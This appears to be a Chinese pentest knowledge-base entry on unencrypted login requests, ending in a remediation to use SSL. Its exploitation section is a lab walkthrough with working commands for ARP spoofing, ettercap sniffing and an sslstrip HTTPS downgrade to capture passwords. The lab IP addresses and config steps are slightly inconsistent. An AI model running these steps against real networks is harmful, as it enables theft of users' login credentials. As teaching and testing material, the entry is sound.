1.11 未加密登陆请求漏洞

1.11 未加密登陆请求漏洞

漏洞描述

网站对用户登录认证信息未进行加密,敏感信息以明文形式进行传送,易在传输过程中被获取。

漏洞等级

中危

漏洞危害

易造成用户敏感信息泄露与篡改。

漏洞利用

实验环境

kali:192.168.0.105 受害机:192.168.0.106

实战抓取http密码

开启流量转发

echo 1 > /proc/sys/net/ipv4/ip_forward

进行arp欺骗

开启监听

ettercap -Tq -i eth0

目标机登录账户密码

kali返回账户密码

实战抓取https密码

1、root@kali:~# arpspoof -i eth0 -t 10.10.10.129 10.10.10.2

2、更改Sslstrip 配置文件

vim /etc/ettercap/etter.conf

if you use iptables:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

将这两行的注释去掉如下:

if you use iptables:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

3、root@kali:~# sslstrip -a -f -k

4、root@kali:~# ettercap -Tq -i eth0

漏洞修复

建议通过加密连接(如SSL)方式进行敏感信息的传送。

Last updated